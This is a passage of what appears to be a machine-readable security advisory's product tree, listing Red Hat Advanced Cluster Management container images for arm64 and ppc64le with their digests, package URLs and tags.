"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259208"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259157"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3A6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3Ab807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233417"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233463"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3Aee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773639113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3Add779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259185"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3Ac6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680856"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185877"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531422"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3A5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773283045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773963430"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773285089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3A438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926643"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3A4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3Ad92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3Afd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259158"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3Ac11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774002166"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3Ac24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099456"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531402"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090422"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3Acde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259171"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3A33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773940676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Adc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773674653"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3Aea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259182"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358651"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
